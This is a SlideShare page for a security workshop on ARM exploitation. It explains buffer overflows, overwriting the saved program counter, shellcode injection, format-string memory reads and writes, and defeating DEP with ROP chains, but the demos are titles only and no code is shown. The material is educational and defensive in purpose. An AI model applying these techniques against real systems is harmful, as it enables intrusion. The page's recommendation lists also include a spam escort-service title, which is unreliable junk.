SlideShare a Scribd company logo

Advanced ARM Exploitation Techniques

H
Himanshu Khokhar Jaat

1. The document outlines an agenda for a workshop on advanced ARM exploitation. The agenda includes introductions to memory corruption, buffer overflows, format string exploitation, and techniques for bypassing exploit mitigations like DEP using return-oriented programming (ROP). 2. Practical demonstrations are provided on topics like visualizing stack corruption from buffer overflows, overwriting the instruction pointer to hijack execution, injecting and executing shellcode payloads, reading and writing arbitrary memory with format strings, and creating ROP chains to bypass DEP. 3. The speakers are introduced as security researchers and instructors specializing in areas like exploit development, malware, rootkits, and reverse engineering. Attendees are encouraged to contact

Education
1 of 38
Download to read offline
Advanced ARM Exploitation BSidesMaharastra Workshop
#whoami ● Ravi Rajput ● Chapter Lead of Null Ahmedabad ● Author at 1daylabs.ml ● Passionate and working in binary exploitation ● Ping me @infosecRavi
#whoami ● Himanshu Khokhar Jaat ● Independent Security Researcher ● Speaker, Instructor ● Love Exploit Development, Malwares, Rootkits and RE ● Ping me @pwnrip
Agenda 1. Introduction to Memory Corruption 2. Taxonomy of Vulnerabilities 3. Introduction to Buffer Overflow 4. Practical Buffer Overflow Exploitation 5. Format String Exploitation 6. DEP Bypass and ROP
1. Introduction to Memory Corruption
Memory Corruption ● “Memory corruption occurs in a computer program when the contents of a memory location are modified due to programmatic behavior that exceeds the intention of the original programmer or program/language constructs; this is termed violating memory safety. The most likely cause of memory corruption is programming error.” - Wikipedia ● Usually, the software crashes as the state of execution has been corrupted. ● In some cases, it can be leveraged to control execution of the program. ● This is what we are going to do today. :)
2. Taxonomy of Vulnerabilities
Taxonomy of Vulnerabilities ● Software bugs come in many shapes and sizes, and flavors too. ● Most commonly seen bugs are: ○ Buffer Overflows ■ Stack based buffer overflow ■ Heap based buffer overflow ○ Uninitialized variable exploitation ○ Use After Free ○ Format String bugs ○ Command Injection ○ Integer Overflows
3. Introduction to Buffer Overflows
Introduction to Buffer Overflow ● “A buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory locations.” - Wikipedia ● One of the most common (and perhaps, most exploited) memory corruption bug. ● First research on exploitation of buffer overflows in 1996 by AlephOne ● Simplest case scenario is when a function does not check the size of data that is being written to memory.
Visualization of Buffer Overflow Attack - TechTarget
Demo: Visualizing stack corruption via buffer overflow
Exploit Mitigation Techniques on Linux ● As exploitation became more and more common, it was expected that developers will use some kind of mitigation techniques - to either shut down the vulnerability classes or to make it harder to exploit. ● Most common exploit mitigation techniques are: ○ SSP/ Stack Canaries - Places a random value before return address and if that is modified, aborts the process. ○ ASLR - Changes memory mapping randomly, on each execution. ○ NX/DEP - Disables code execution from memory which is not marked as executable. ○ RELRO - Relocation Read Only - Resolves dynamic symbols before execution and marks GOT as non-writable ○ PIE - makes the whole binary as Position Independent.
4. Practical Buffer Overflow Exploitation
Practical Buffer Overflow Exploitation ● As we saw, we can overwrite adjacent memory location with the data of our choice. ● Since PC is saved on the stack during function calls, we can overwrite is through buffer overflow. ● If we write long enough, we will overwrite the Program Counter, which points to the next instruction to get executed. ● Note: PC must point to a valid area in memory or the process will crash.
Demo: Overwriting saved PC to hijack process execution
Practical Buffer Overflow Exploitation ● So far, we control the flow of execution. ● But what if we want to execute our own shellcode?
Practical Buffer Overflow Exploitation ● So far, we control the flow of execution. ● But what if we want to execute our own shellcode? ● We need to inject our shellcode along with the input data and then point PC to it.
Demo: Getting shell through buffer overflow
5. Format String Exploitation
Introduction to Format Strings ● A format string is a string that consists of format specifiers which directs the interpretation of input. ● Used by a family of functions, usually the printf family. For eg: printf, sprintf, vprintf, snprintf, etc.
Format Specifiers in C/C++ - cplusplus.com
Introduction to Format String Vulnerability ● A format string vulnerability occurs when strings are not sanitized properly and are passed to function that use format strings. ● Attacker can craft a format string which can then be used to read data from stack, memory or write arbitrary values in memory to control execution.
Demo: Understanding Format String Vulnerability
Reading Arbitrary Memory using Format Strings ● As we saw, we can read data from stack using %x. ● But what if the data that we intend to read is not on the stack? ● We will leverage other format specifiers to read data from specific memory locations.
Demo: Reading Arbitrary Memory using Format Strings
Writing Arbitrary Memory using Format Strings ● Reading is nice, but it doesn’t let us control anything. ● What if we could change anything in memory? ● Fortunately, %n lets us write to memory, though not as simple as it seems.
Demo: Writing Arbitrary Memory using Format Strings
6. DEP Bypass and ROP
Buffer Overflows revisited ● We already saw how to exploit buffer overflows. ● But usually, there are mitigations that protect applications from such attacks. ● DEP is one of the most common mitigation that is on by default. ● Let’s see how DEP affects our exploitation strategy.
Demo: Exploiting Buffer Overflow under DEP
DEP Bypass Strategy ● As we confirmed, we cannot execute our payload from stack. ● DEP does not allow execution of content from non-executable memory.
DEP Bypass Strategy ● As we confirmed, we cannot execute our payload from stack. ● DEP does not allow execution of content from non-executable memory. ● But we can still corrupt the stack. ● How can we get a shell if we cannot execute anything from stack?
Welcome to Return Oriented Programming
Return Oriented Programming ● ROP works on the very simple fact that we can still control PC. ● Since we control the stack, we control PC. ● The idea is to find gadgets and use them to control execution of process. ● A gadget is a sequence of instructions followed by a return statement, pop {pc} in ARM context.
Demo: Finding ROP Gadgets with Ropper
Demo: Creating ROP Chain to bypass DEP
Thank you :D

Recommended

python classes in thane
python classes in thanepython classes in thane
python classes in thanefaizrashid1995
 
Java under the hood
Java under the hoodJava under the hood
Java under the hoodVachagan Balayan
 
Buffer Overflow
Buffer OverflowBuffer Overflow
Buffer OverflowKaustubh Padwad
 
Resisting App Pirates
Resisting App PiratesResisting App Pirates
Resisting App Piratesripeapps
 
Engineering & security
Engineering & securityEngineering & security
Engineering & securityKaushal Parikh
 
2019 PHP Serbia - Boosting your performance with Blackfire
2019 PHP Serbia - Boosting your performance with Blackfire2019 PHP Serbia - Boosting your performance with Blackfire
2019 PHP Serbia - Boosting your performance with BlackfireMarko Mitranić
 
Inside the JVM
Inside the JVMInside the JVM
Inside the JVMJim Jagielski
 
Basics of Metaprogramming in Ruby
Basics of Metaprogramming in RubyBasics of Metaprogramming in Ruby
Basics of Metaprogramming in RubyDigital Natives
 

Recommended

python classes in thane
python classes in thanepython classes in thane
python classes in thanefaizrashid1995
 
Java under the hood
Java under the hoodJava under the hood
Java under the hoodVachagan Balayan
 
Buffer Overflow
Buffer OverflowBuffer Overflow
Buffer OverflowKaustubh Padwad
 
Resisting App Pirates
Resisting App PiratesResisting App Pirates
Resisting App Piratesripeapps
 
Engineering & security
Engineering & securityEngineering & security
Engineering & securityKaushal Parikh
 
2019 PHP Serbia - Boosting your performance with Blackfire
2019 PHP Serbia - Boosting your performance with Blackfire2019 PHP Serbia - Boosting your performance with Blackfire
2019 PHP Serbia - Boosting your performance with BlackfireMarko Mitranić
 
Inside the JVM
Inside the JVMInside the JVM
Inside the JVMJim Jagielski
 
Basics of Metaprogramming in Ruby
Basics of Metaprogramming in RubyBasics of Metaprogramming in Ruby
Basics of Metaprogramming in RubyDigital Natives
 
Fuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 JuneFuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 Junenullowaspmumbai
 
Buffer overflow explained
Buffer overflow explainedBuffer overflow explained
Buffer overflow explainedTeja Babu
 
High-Performance Networking Using eBPF, XDP, and io_uring
High-Performance Networking Using eBPF, XDP, and io_uringHigh-Performance Networking Using eBPF, XDP, and io_uring
High-Performance Networking Using eBPF, XDP, and io_uringScyllaDB
 
Spaghetti gate
Spaghetti gateSpaghetti gate
Spaghetti gateJon Bachelor
 
Performance optimization techniques for Java code
Performance optimization techniques for Java codePerformance optimization techniques for Java code
Performance optimization techniques for Java codeAttila Balazs
 
Stack Frame Protection
Stack Frame ProtectionStack Frame Protection
Stack Frame ProtectionConferencias FIST
 
TechGIG_Memory leaks in_java_webnair_26th_july_2012
TechGIG_Memory leaks in_java_webnair_26th_july_2012TechGIG_Memory leaks in_java_webnair_26th_july_2012
TechGIG_Memory leaks in_java_webnair_26th_july_2012Ashish Bhasin
 
PHP - Introduction to PHP Bugs - Debugging
PHP - Introduction to PHP Bugs - DebuggingPHP - Introduction to PHP Bugs - Debugging
PHP - Introduction to PHP Bugs - DebuggingVibrant Technologies & Computers
 
Application Profiling for Memory and Performance
Application Profiling for Memory and PerformanceApplication Profiling for Memory and Performance
Application Profiling for Memory and PerformanceWSO2
 
Application Profiling for Memory and Performance
Application Profiling for Memory and PerformanceApplication Profiling for Memory and Performance
Application Profiling for Memory and Performancepradeepfn
 
Vulnerability, exploit to metasploit
Vulnerability, exploit to metasploitVulnerability, exploit to metasploit
Vulnerability, exploit to metasploitTiago Henriques
 
MongoDb scalability and high availability with Replica-Set
MongoDb scalability and high availability with Replica-SetMongoDb scalability and high availability with Replica-Set
MongoDb scalability and high availability with Replica-SetVivek Parihar
 
Introduction to Parallelization ans performance optimization
Introduction to Parallelization ans performance optimizationIntroduction to Parallelization ans performance optimization
Introduction to Parallelization ans performance optimizationCSUC - Consorci de Serveis Universitaris de Catalunya
 
NDC London 2014: Erlang Patterns Matching Business Needs
NDC London 2014: Erlang Patterns Matching Business NeedsNDC London 2014: Erlang Patterns Matching Business Needs
NDC London 2014: Erlang Patterns Matching Business NeedsTorben Hoffmann
 
Dont run with scissors
Dont run with scissorsDont run with scissors
Dont run with scissorsMorgan Roman
 
Internet of Things, TYBSC IT, Semester 5, Unit IV
Internet of Things, TYBSC IT, Semester 5, Unit IVInternet of Things, TYBSC IT, Semester 5, Unit IV
Internet of Things, TYBSC IT, Semester 5, Unit IVArti Parab Academics
 
The Good, the Bad and the Ugly things to do with android
The Good, the Bad and the Ugly things to do with androidThe Good, the Bad and the Ugly things to do with android
The Good, the Bad and the Ugly things to do with androidStanojko Markovik
 
PyCon Canada 2019 - Introduction to Asynchronous Programming
PyCon Canada 2019 - Introduction to Asynchronous ProgrammingPyCon Canada 2019 - Introduction to Asynchronous Programming
PyCon Canada 2019 - Introduction to Asynchronous ProgrammingJuti Noppornpitak
 
Introduction to Parallelization ans performance optimization
Introduction to Parallelization ans performance optimizationIntroduction to Parallelization ans performance optimization
Introduction to Parallelization ans performance optimizationCSUC - Consorci de Serveis Universitaris de Catalunya
 
High Reliabilty Systems
High Reliabilty SystemsHigh Reliabilty Systems
High Reliabilty SystemsLloydMoore
 
Biting mechanism of poisonous snakes.pdf
Biting mechanism of poisonous snakes.pdfBiting mechanism of poisonous snakes.pdf
Biting mechanism of poisonous snakes.pdfadityarao40181
 
Alper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentAlper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentInMediaRes1
 

More Related Content

Similar to Advanced ARM Exploitation Techniques

Fuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 JuneFuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 Junenullowaspmumbai
 
Buffer overflow explained
Buffer overflow explainedBuffer overflow explained
Buffer overflow explainedTeja Babu
 
High-Performance Networking Using eBPF, XDP, and io_uring
High-Performance Networking Using eBPF, XDP, and io_uringHigh-Performance Networking Using eBPF, XDP, and io_uring
High-Performance Networking Using eBPF, XDP, and io_uringScyllaDB
 
Performance optimization techniques for Java code
Performance optimization techniques for Java codePerformance optimization techniques for Java code
Performance optimization techniques for Java codeAttila Balazs
 
TechGIG_Memory leaks in_java_webnair_26th_july_2012
TechGIG_Memory leaks in_java_webnair_26th_july_2012TechGIG_Memory leaks in_java_webnair_26th_july_2012
TechGIG_Memory leaks in_java_webnair_26th_july_2012Ashish Bhasin
 
Application Profiling for Memory and Performance
Application Profiling for Memory and PerformanceApplication Profiling for Memory and Performance
Application Profiling for Memory and PerformanceWSO2
 
Application Profiling for Memory and Performance
Application Profiling for Memory and PerformanceApplication Profiling for Memory and Performance
Application Profiling for Memory and Performancepradeepfn
 
Vulnerability, exploit to metasploit
Vulnerability, exploit to metasploitVulnerability, exploit to metasploit
Vulnerability, exploit to metasploitTiago Henriques
 
MongoDb scalability and high availability with Replica-Set
MongoDb scalability and high availability with Replica-SetMongoDb scalability and high availability with Replica-Set
MongoDb scalability and high availability with Replica-SetVivek Parihar
 
NDC London 2014: Erlang Patterns Matching Business Needs
NDC London 2014: Erlang Patterns Matching Business NeedsNDC London 2014: Erlang Patterns Matching Business Needs
NDC London 2014: Erlang Patterns Matching Business NeedsTorben Hoffmann
 
Dont run with scissors
Dont run with scissorsDont run with scissors
Dont run with scissorsMorgan Roman
 
Internet of Things, TYBSC IT, Semester 5, Unit IV
Internet of Things, TYBSC IT, Semester 5, Unit IVInternet of Things, TYBSC IT, Semester 5, Unit IV
Internet of Things, TYBSC IT, Semester 5, Unit IVArti Parab Academics
 
The Good, the Bad and the Ugly things to do with android
The Good, the Bad and the Ugly things to do with androidThe Good, the Bad and the Ugly things to do with android
The Good, the Bad and the Ugly things to do with androidStanojko Markovik
 
PyCon Canada 2019 - Introduction to Asynchronous Programming
PyCon Canada 2019 - Introduction to Asynchronous ProgrammingPyCon Canada 2019 - Introduction to Asynchronous Programming
PyCon Canada 2019 - Introduction to Asynchronous ProgrammingJuti Noppornpitak
 
High Reliabilty Systems
High Reliabilty SystemsHigh Reliabilty Systems
High Reliabilty SystemsLloydMoore
 

Similar to Advanced ARM Exploitation Techniques (20)

Fuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 JuneFuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 June
 
Buffer overflow explained
Buffer overflow explainedBuffer overflow explained
Buffer overflow explained
 
High-Performance Networking Using eBPF, XDP, and io_uring
High-Performance Networking Using eBPF, XDP, and io_uringHigh-Performance Networking Using eBPF, XDP, and io_uring
High-Performance Networking Using eBPF, XDP, and io_uring
 
Spaghetti gate
Spaghetti gateSpaghetti gate
Spaghetti gate
 
Performance optimization techniques for Java code
Performance optimization techniques for Java codePerformance optimization techniques for Java code
Performance optimization techniques for Java code
 
Stack Frame Protection
Stack Frame ProtectionStack Frame Protection
Stack Frame Protection
 
TechGIG_Memory leaks in_java_webnair_26th_july_2012
TechGIG_Memory leaks in_java_webnair_26th_july_2012TechGIG_Memory leaks in_java_webnair_26th_july_2012
TechGIG_Memory leaks in_java_webnair_26th_july_2012
 
PHP - Introduction to PHP Bugs - Debugging
PHP - Introduction to PHP Bugs - DebuggingPHP - Introduction to PHP Bugs - Debugging
PHP - Introduction to PHP Bugs - Debugging
 
Application Profiling for Memory and Performance
Application Profiling for Memory and PerformanceApplication Profiling for Memory and Performance
Application Profiling for Memory and Performance
 
Application Profiling for Memory and Performance
Application Profiling for Memory and PerformanceApplication Profiling for Memory and Performance
Application Profiling for Memory and Performance
 
Vulnerability, exploit to metasploit
Vulnerability, exploit to metasploitVulnerability, exploit to metasploit
Vulnerability, exploit to metasploit
 
MongoDb scalability and high availability with Replica-Set
MongoDb scalability and high availability with Replica-SetMongoDb scalability and high availability with Replica-Set
MongoDb scalability and high availability with Replica-Set
 
Introduction to Parallelization ans performance optimization
Introduction to Parallelization ans performance optimizationIntroduction to Parallelization ans performance optimization
Introduction to Parallelization ans performance optimization
 
NDC London 2014: Erlang Patterns Matching Business Needs
NDC London 2014: Erlang Patterns Matching Business NeedsNDC London 2014: Erlang Patterns Matching Business Needs
NDC London 2014: Erlang Patterns Matching Business Needs
 
Dont run with scissors
Dont run with scissorsDont run with scissors
Dont run with scissors
 
Internet of Things, TYBSC IT, Semester 5, Unit IV
Internet of Things, TYBSC IT, Semester 5, Unit IVInternet of Things, TYBSC IT, Semester 5, Unit IV
Internet of Things, TYBSC IT, Semester 5, Unit IV
 
The Good, the Bad and the Ugly things to do with android
The Good, the Bad and the Ugly things to do with androidThe Good, the Bad and the Ugly things to do with android
The Good, the Bad and the Ugly things to do with android
 
PyCon Canada 2019 - Introduction to Asynchronous Programming
PyCon Canada 2019 - Introduction to Asynchronous ProgrammingPyCon Canada 2019 - Introduction to Asynchronous Programming
PyCon Canada 2019 - Introduction to Asynchronous Programming
 
Introduction to Parallelization ans performance optimization
Introduction to Parallelization ans performance optimizationIntroduction to Parallelization ans performance optimization
Introduction to Parallelization ans performance optimization
 
High Reliabilty Systems
High Reliabilty SystemsHigh Reliabilty Systems
High Reliabilty Systems
 

Recently uploaded

Biting mechanism of poisonous snakes.pdf
Biting mechanism of poisonous snakes.pdfBiting mechanism of poisonous snakes.pdf
Biting mechanism of poisonous snakes.pdfadityarao40181
 
Alper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentAlper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentInMediaRes1
 
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️9953056974 Low Rate Call Girls In Saket, Delhi NCR
 
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPTECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPTiammrhaywood
 
Pharmacognosy Flower 3. Compositae 2023.pdf
Pharmacognosy Flower 3. Compositae 2023.pdfPharmacognosy Flower 3. Compositae 2023.pdf
Pharmacognosy Flower 3. Compositae 2023.pdfMahmoud M. Sallam
 
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdfssuser54595a
 
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptxPOINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptxSayali Powar
 
EPANDING THE CONTENT OF AN OUTLINE using notes.pptx
EPANDING THE CONTENT OF AN OUTLINE using notes.pptxEPANDING THE CONTENT OF AN OUTLINE using notes.pptx
EPANDING THE CONTENT OF AN OUTLINE using notes.pptxRaymartEstabillo3
 
Computed Fields and api Depends in the Odoo 17
Computed Fields and api Depends in the Odoo 17Computed Fields and api Depends in the Odoo 17
Computed Fields and api Depends in the Odoo 17Celine George
 
Solving Puzzles Benefits Everyone (English).pptx
Solving Puzzles Benefits Everyone (English).pptxSolving Puzzles Benefits Everyone (English).pptx
Solving Puzzles Benefits Everyone (English).pptxOH TEIK BIN
 
Presiding Officer Training module 2024 lok sabha elections
Presiding Officer Training module 2024 lok sabha electionsPresiding Officer Training module 2024 lok sabha elections
Presiding Officer Training module 2024 lok sabha electionsanshu789521
 
Final demo Grade 9 for demo Plan dessert.pptx
Final demo Grade 9 for demo Plan dessert.pptxFinal demo Grade 9 for demo Plan dessert.pptx
Final demo Grade 9 for demo Plan dessert.pptxAvyJaneVismanos
 
Roles & Responsibilities in Pharmacovigilance
Roles & Responsibilities in PharmacovigilanceRoles & Responsibilities in Pharmacovigilance
Roles & Responsibilities in PharmacovigilanceSamikshaHamane
 
MARGINALIZATION (Different learners in Marginalized Group
MARGINALIZATION (Different learners in Marginalized GroupMARGINALIZATION (Different learners in Marginalized Group
MARGINALIZATION (Different learners in Marginalized GroupJonathanParaisoCruz
 
Hierarchy of management that covers different levels of management
Hierarchy of management that covers different levels of managementHierarchy of management that covers different levels of management
Hierarchy of management that covers different levels of managementmkooblal
 
Framing an Appropriate Research Question 6b9b26d93da94caf993c038d9efcdedb.pdf
Framing an Appropriate Research Question 6b9b26d93da94caf993c038d9efcdedb.pdfFraming an Appropriate Research Question 6b9b26d93da94caf993c038d9efcdedb.pdf
Framing an Appropriate Research Question 6b9b26d93da94caf993c038d9efcdedb.pdfUjwalaBharambe
 
How to Make a Pirate ship Primary Education.pptx
How to Make a Pirate ship Primary Education.pptxHow to Make a Pirate ship Primary Education.pptx
How to Make a Pirate ship Primary Education.pptxmanuelaromero2013
 
Crayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon ACrayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon AUnboundStockton
 

Recently uploaded (20)

Biting mechanism of poisonous snakes.pdf
Biting mechanism of poisonous snakes.pdfBiting mechanism of poisonous snakes.pdf
Biting mechanism of poisonous snakes.pdf
 
Alper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentAlper Gobel In Media Res Media Component
Alper Gobel In Media Res Media Component
 
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
 
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPTECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
 
Pharmacognosy Flower 3. Compositae 2023.pdf
Pharmacognosy Flower 3. Compositae 2023.pdfPharmacognosy Flower 3. Compositae 2023.pdf
Pharmacognosy Flower 3. Compositae 2023.pdf
 
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
 
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptxPOINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
 
EPANDING THE CONTENT OF AN OUTLINE using notes.pptx
EPANDING THE CONTENT OF AN OUTLINE using notes.pptxEPANDING THE CONTENT OF AN OUTLINE using notes.pptx
EPANDING THE CONTENT OF AN OUTLINE using notes.pptx
 
Computed Fields and api Depends in the Odoo 17
Computed Fields and api Depends in the Odoo 17Computed Fields and api Depends in the Odoo 17
Computed Fields and api Depends in the Odoo 17
 
ESSENTIAL of (CS/IT/IS) class 06 (database)
ESSENTIAL of (CS/IT/IS) class 06 (database)ESSENTIAL of (CS/IT/IS) class 06 (database)
ESSENTIAL of (CS/IT/IS) class 06 (database)
 
Solving Puzzles Benefits Everyone (English).pptx
Solving Puzzles Benefits Everyone (English).pptxSolving Puzzles Benefits Everyone (English).pptx
Solving Puzzles Benefits Everyone (English).pptx
 
Presiding Officer Training module 2024 lok sabha elections
Presiding Officer Training module 2024 lok sabha electionsPresiding Officer Training module 2024 lok sabha elections
Presiding Officer Training module 2024 lok sabha elections
 
TataKelola dan KamSiber Kecerdasan Buatan v022.pdf
TataKelola dan KamSiber Kecerdasan Buatan v022.pdfTataKelola dan KamSiber Kecerdasan Buatan v022.pdf
TataKelola dan KamSiber Kecerdasan Buatan v022.pdf
 
Final demo Grade 9 for demo Plan dessert.pptx
Final demo Grade 9 for demo Plan dessert.pptxFinal demo Grade 9 for demo Plan dessert.pptx
Final demo Grade 9 for demo Plan dessert.pptx
 
Roles & Responsibilities in Pharmacovigilance
Roles & Responsibilities in PharmacovigilanceRoles & Responsibilities in Pharmacovigilance
Roles & Responsibilities in Pharmacovigilance
 
MARGINALIZATION (Different learners in Marginalized Group
MARGINALIZATION (Different learners in Marginalized GroupMARGINALIZATION (Different learners in Marginalized Group
MARGINALIZATION (Different learners in Marginalized Group
 
Hierarchy of management that covers different levels of management
Hierarchy of management that covers different levels of managementHierarchy of management that covers different levels of management
Hierarchy of management that covers different levels of management
 
Framing an Appropriate Research Question 6b9b26d93da94caf993c038d9efcdedb.pdf
Framing an Appropriate Research Question 6b9b26d93da94caf993c038d9efcdedb.pdfFraming an Appropriate Research Question 6b9b26d93da94caf993c038d9efcdedb.pdf
Framing an Appropriate Research Question 6b9b26d93da94caf993c038d9efcdedb.pdf
 
How to Make a Pirate ship Primary Education.pptx
How to Make a Pirate ship Primary Education.pptxHow to Make a Pirate ship Primary Education.pptx
How to Make a Pirate ship Primary Education.pptx
 
Crayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon ACrayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon A
 

Advanced ARM Exploitation Techniques

  • 2. #whoami ● Ravi Rajput ● Chapter Lead of Null Ahmedabad ● Author at 1daylabs.ml ● Passionate and working in binary exploitation ● Ping me @infosecRavi
  • 3. #whoami ● Himanshu Khokhar Jaat ● Independent Security Researcher ● Speaker, Instructor ● Love Exploit Development, Malwares, Rootkits and RE ● Ping me @pwnrip
  • 4. Agenda 1. Introduction to Memory Corruption 2. Taxonomy of Vulnerabilities 3. Introduction to Buffer Overflow 4. Practical Buffer Overflow Exploitation 5. Format String Exploitation 6. DEP Bypass and ROP
  • 5. 1. Introduction to Memory Corruption
  • 6. Memory Corruption ● “Memory corruption occurs in a computer program when the contents of a memory location are modified due to programmatic behavior that exceeds the intention of the original programmer or program/language constructs; this is termed violating memory safety. The most likely cause of memory corruption is programming error.” - Wikipedia ● Usually, the software crashes as the state of execution has been corrupted. ● In some cases, it can be leveraged to control execution of the program. ● This is what we are going to do today. :)
  • 7. 2. Taxonomy of Vulnerabilities
  • 8. Taxonomy of Vulnerabilities ● Software bugs come in many shapes and sizes, and flavors too. ● Most commonly seen bugs are: ○ Buffer Overflows ■ Stack based buffer overflow ■ Heap based buffer overflow ○ Uninitialized variable exploitation ○ Use After Free ○ Format String bugs ○ Command Injection ○ Integer Overflows
  • 9. 3. Introduction to Buffer Overflows
  • 10. Introduction to Buffer Overflow ● “A buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory locations.” - Wikipedia ● One of the most common (and perhaps, most exploited) memory corruption bug. ● First research on exploitation of buffer overflows in 1996 by AlephOne ● Simplest case scenario is when a function does not check the size of data that is being written to memory.
  • 11. Visualization of Buffer Overflow Attack - TechTarget
  • 12. Demo: Visualizing stack corruption via buffer overflow
  • 13. Exploit Mitigation Techniques on Linux ● As exploitation became more and more common, it was expected that developers will use some kind of mitigation techniques - to either shut down the vulnerability classes or to make it harder to exploit. ● Most common exploit mitigation techniques are: ○ SSP/ Stack Canaries - Places a random value before return address and if that is modified, aborts the process. ○ ASLR - Changes memory mapping randomly, on each execution. ○ NX/DEP - Disables code execution from memory which is not marked as executable. ○ RELRO - Relocation Read Only - Resolves dynamic symbols before execution and marks GOT as non-writable ○ PIE - makes the whole binary as Position Independent.
  • 14. 4. Practical Buffer Overflow Exploitation
  • 15. Practical Buffer Overflow Exploitation ● As we saw, we can overwrite adjacent memory location with the data of our choice. ● Since PC is saved on the stack during function calls, we can overwrite is through buffer overflow. ● If we write long enough, we will overwrite the Program Counter, which points to the next instruction to get executed. ● Note: PC must point to a valid area in memory or the process will crash.
  • 16. Demo: Overwriting saved PC to hijack process execution
  • 17. Practical Buffer Overflow Exploitation ● So far, we control the flow of execution. ● But what if we want to execute our own shellcode?
  • 18. Practical Buffer Overflow Exploitation ● So far, we control the flow of execution. ● But what if we want to execute our own shellcode? ● We need to inject our shellcode along with the input data and then point PC to it.
  • 19. Demo: Getting shell through buffer overflow
  • 20. 5. Format String Exploitation
  • 21. Introduction to Format Strings ● A format string is a string that consists of format specifiers which directs the interpretation of input. ● Used by a family of functions, usually the printf family. For eg: printf, sprintf, vprintf, snprintf, etc.
  • 22. Format Specifiers in C/C++ - cplusplus.com
  • 23. Introduction to Format String Vulnerability ● A format string vulnerability occurs when strings are not sanitized properly and are passed to function that use format strings. ● Attacker can craft a format string which can then be used to read data from stack, memory or write arbitrary values in memory to control execution.
  • 25. Reading Arbitrary Memory using Format Strings ● As we saw, we can read data from stack using %x. ● But what if the data that we intend to read is not on the stack? ● We will leverage other format specifiers to read data from specific memory locations.
  • 26. Demo: Reading Arbitrary Memory using Format Strings
  • 27. Writing Arbitrary Memory using Format Strings ● Reading is nice, but it doesn’t let us control anything. ● What if we could change anything in memory? ● Fortunately, %n lets us write to memory, though not as simple as it seems.
  • 28. Demo: Writing Arbitrary Memory using Format Strings
  • 29. 6. DEP Bypass and ROP
  • 30. Buffer Overflows revisited ● We already saw how to exploit buffer overflows. ● But usually, there are mitigations that protect applications from such attacks. ● DEP is one of the most common mitigation that is on by default. ● Let’s see how DEP affects our exploitation strategy.
  • 31. Demo: Exploiting Buffer Overflow under DEP
  • 32. DEP Bypass Strategy ● As we confirmed, we cannot execute our payload from stack. ● DEP does not allow execution of content from non-executable memory.
  • 33. DEP Bypass Strategy ● As we confirmed, we cannot execute our payload from stack. ● DEP does not allow execution of content from non-executable memory. ● But we can still corrupt the stack. ● How can we get a shell if we cannot execute anything from stack?
  • 34. Welcome to Return Oriented Programming
  • 35. Return Oriented Programming ● ROP works on the very simple fact that we can still control PC. ● Since we control the stack, we control PC. ● The idea is to find gadgets and use them to control execution of process. ● A gadget is a sequence of instructions followed by a return statement, pop {pc} in ARM context.
  • 36. Demo: Finding ROP Gadgets with Ropper
  • 37. Demo: Creating ROP Chain to bypass DEP